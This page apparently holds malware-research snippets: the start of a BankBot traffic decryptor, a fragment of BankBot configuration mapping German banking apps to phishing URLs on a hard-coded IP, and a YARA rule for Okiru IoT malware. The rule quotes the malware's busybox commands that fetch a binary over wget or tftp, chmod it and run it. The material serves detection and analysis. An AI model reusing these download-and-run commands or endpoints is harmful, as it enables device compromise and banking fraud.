This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import urllib | |
__author__ = 'fdiaz@hispasec.com' | |
""" Script to decrypt bankbot communications | |
argv[1] = key | |
argv[2] = encrypted string | |
Example: | |
decrypter.py "qwe" "5w wqq 98 5w 49 wqe 5e 5q 48 48 wqe 98 97 55 53 53 37 5w 65 49 37 5w 65 48" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[{ | |
"to": "com.db.mm.deutschebank", | |
"body": "http://188.209.49.198/777/l/05.php" | |
}, { | |
"to": "de.commerzbanking.mobil", | |
"body": " http://188.209.49.198/777/l/06.php" | |
}, { | |
"to": "com.ing.diba.mbbr2", | |
"body": " http://188.209.49.198/777/l/13.php" | |
}, { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule Okiru : arm7 { | |
meta: | |
date = "11.12.2017" | |
description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found." | |
strings: | |
$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s" | |
$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s" | |
$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'" |